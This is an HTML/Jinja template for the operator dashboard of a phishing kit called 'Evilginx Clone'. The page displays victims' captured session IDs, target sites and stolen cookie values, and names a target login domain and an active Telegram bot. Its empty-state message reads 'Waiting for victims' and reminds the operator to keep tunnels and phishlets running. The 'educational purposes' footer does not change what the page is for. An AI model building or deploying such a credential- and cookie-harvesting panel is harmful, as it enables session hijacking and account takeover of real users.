<!DOCTYPE html>
<html lang="ar" dir="ltr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Evilginx Clone - Dashboard</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: #333;
            min-height: 100vh;
            padding: 20px;
        }
        .container {
            max-width: 1400px;
            margin: 0 auto;
        }
        .header {
            background: white;
            border-radius: 10px;
            padding: 20px;
            margin-bottom: 20px;
            box-shadow: 0 4px 6px rgba(0,0,0,0.1);
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        .header h1 {
            color: #667eea;
            display: flex;
            align-items: center;
            gap: 10px;
        }
        .header h1 span {
            background: #667eea;
            color: white;
            font-size: 14px;
            padding: 4px 8px;
            border-radius: 20px;
        }
        .stats {
            display: flex;
            gap: 20px;
        }
        .stat-card {
            background: #f8f9fa;
            border-radius: 8px;
            padding: 10px 20px;
            text-align: center;
        }
        .stat-card .label {
            font-size: 12px;
            color: #666;
        }
        .stat-card .value {
            font-size: 24px;
            font-weight: bold;
            color: #667eea;
        }
        .sessions-container {
            background: white;
            border-radius: 10px;
            padding: 20px;
            box-shadow: 0 4px 6px rgba(0,0,0,0.1);
        }
        .sessions-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 20px;
        }
        .btn {
            padding: 8px 16px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 14px;
            transition: all 0.3s;
        }
        .btn-primary {
            background: #667eea;
            color: white;
        }
        .btn-primary:hover {
            background: #5a67d8;
        }
        .btn-danger {
            background: #e53e3e;
            color: white;
        }
        .btn-danger:hover {
            background: #c53030;
        }
        table {
            width: 100%;
            border-collapse: collapse;
        }
        th {
            background: #f8f9fa;
            padding: 12px;
            text-align: left;
            font-weight: 600;
            color: #666;
        }
        td {
            padding: 12px;
            border-bottom: 1px solid #e2e8f0;
        }
        tr:hover {
            background: #f8f9fa;
        }
        .cookie-preview {
            max-width: 300px;
            overflow: hidden;
            text-overflow: ellipsis;
            white-space: nowrap;
            font-family: monospace;
            font-size: 12px;
            color: #666;
        }
        .badge {
            display: inline-block;
            padding: 4px 8px;
            border-radius: 20px;
            font-size: 12px;
            font-weight: 600;
        }
        .badge-success {
            background: #c6f6d5;
            color: #22543d;
        }
        .actions {
            display: flex;
            gap: 8px;
        }
        .actions a {
            text-decoration: none;
            color: #667eea;
            font-size: 14px;
        }
        .actions a:hover {
            text-decoration: underline;
        }
        .footer {
            margin-top: 20px;
            text-align: center;
            color: white;
            font-size: 12px;
        }
        .footer a {
            color: white;
            text-decoration: none;
        }
        .footer a:hover {
            text-decoration: underline;
        }
        .empty-state {
            text-align: center;
            padding: 40px;
            color: #999;
        }
        .telegram-badge {
            background: #0088cc;
            color: white;
            padding: 8px 16px;
            border-radius: 20px;
            font-size: 14px;
            display: inline-flex;
            align-items: center;
            gap: 8px;
        }
        .telegram-badge a {
            color: white;
            text-decoration: none;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>
                🎣 Evilginx Clone 
                <span>v3.0</span>
            </h1>
            <div class="telegram-badge">
                <span>🤖 @Amrsavebot</span>
                <a href="https://t.me/Amrsavebot" target="_blank">(Active)</a>
            </div>
        </div>
        
        <div class="stats">
            <div class="stat-card">
                <div class="label">Total Sessions</div>
                <div class="value">{{ sessions|length }}</div>
            </div>
            <div class="stat-card">
                <div class="label">Active Phishlets</div>
                <div class="value">6</div>
            </div>
            <div class="stat-card">
                <div class="label">Target Domain</div>
                <div class="value">login.orvanta.dpdns.org</div>
            </div>
        </div>
        
        <div class="sessions-container">
            <div class="sessions-header">
                <h2>📋 Captured Sessions</h2>
                <div>
                    <a href="/admin/clear" class="btn btn-danger" onclick="return confirm('Are you sure you want to clear all sessions?')">Clear All</a>
                </div>
            </div>
            
            {% if sessions %}
            <table>
                <thead>
                    <tr>
                        <th>Session ID</th>
                        <th>Target</th>
                        <th>Timestamp</th>
                        <th>Cookies</th>
                        <th>Actions</th>
                    </tr>
                </thead>
                <tbody>
                    {% for session_id, data in sessions.items()|reverse %}
                    <tr>
                        <td>
                            <span class="badge badge-success">{{ session_id }}</span>
                        </td>
                        <td>{{ data.site }}</td>
                        <td>{{ data.timestamp }}</td>
                        <td>
                            <div class="cookie-preview">
                                {% for cookie, value in data.cookies.items() %}
                                    <strong>{{ cookie }}:</strong> {{ value[:50] }}{% if value|length > 50 %}...{% endif %}<br>
                                {% endfor %}
                            </div>
                        </td>
                        <td class="actions">
                            <a href="/admin/session/{{ session_id }}" target="_blank">View Full</a>
                            <span>|</span>
                            <a href="#" onclick="copySession('{{ session_id }}'); return false;">Copy ID</a>
                        </td>
                    </tr>
                    {% endfor %}
                </tbody>
            </table>
            {% else %}
            <div class="empty-state">
                <p>✨ No sessions captured yet. Waiting for victims...</p>
                <p style="font-size: 14px; margin-top: 10px;">Make sure your tunnel is active and phishlets are working.</p>
            </div>
            {% endif %}
        </div>
        
        <div class="footer">
            <p>🔒 This is a private dashboard. All captured data is stored locally.</p>
            <p>© 2026 Evilginx Clone | Made for educational purposes | <a href="https://github.com/simplerhacking/Evilginx3-Phishlets" target="_blank">Credits</a></p>
        </div>
    </div>
    
    <script>
        function copySession(sessionId) {
            navigator.clipboard.writeText(sessionId);
            alert('Session ID copied to clipboard!');
        }
    </script>
</body>
</html>